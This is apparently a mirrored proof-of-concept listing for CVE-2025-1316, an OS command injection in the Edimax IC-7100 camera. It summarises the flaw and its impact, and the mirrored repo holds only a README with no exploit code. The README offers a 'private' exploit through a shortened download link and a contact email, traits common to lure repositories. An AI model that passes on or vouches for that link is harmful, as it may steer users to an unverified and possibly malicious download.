CVE-2025-1316 PoC — Edimax IC-7100 操作系统命令注入漏洞

Source

https://github.com/Rimasue/CVE-2025-1316

Associated Vulnerability

Title:Edimax IC-7100 操作系统命令注入漏洞 (CVE-2025-1316)
Description:Edimax IC-7100是中国讯舟（Edimax）公司的一款安全摄像头。 Edimax IC-7100 IP Camera存在操作系统命令注入漏洞，该漏洞源于未正确中和请求，可能导致远程代码执行。

Description

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)

Readme

# CVE-2025-1316
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)
## Overview
A critical vulnerability in the Edimax IC-7100 network camera where the device fails to properly neutralize incoming requests, enabling remote code execution through specially crafted requests.

## Details
+ **CVE ID**: CVE-2025-1316
+ **Published**:03/04/2025

+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.3
## Impact
An unauthenticated attacker can completely compromise the network camera, potentially: - Executing arbitrary remote code - Gaining full control of the camera - Accessing, modifying, or disabling camera systems - Potentially leveraging the device as an entry point into connected networks


## Affected Versions
Edimax IC-7100 network camera
## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**

 ## Exploit
+ **[Download here](https://tinyurl.com/bdfx97me)**

File Snapshot


 [4.0K]  /data/pocs/baf3ad97e91bfa58ca7875f28d7e4566654e91ea
└── [ 970]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!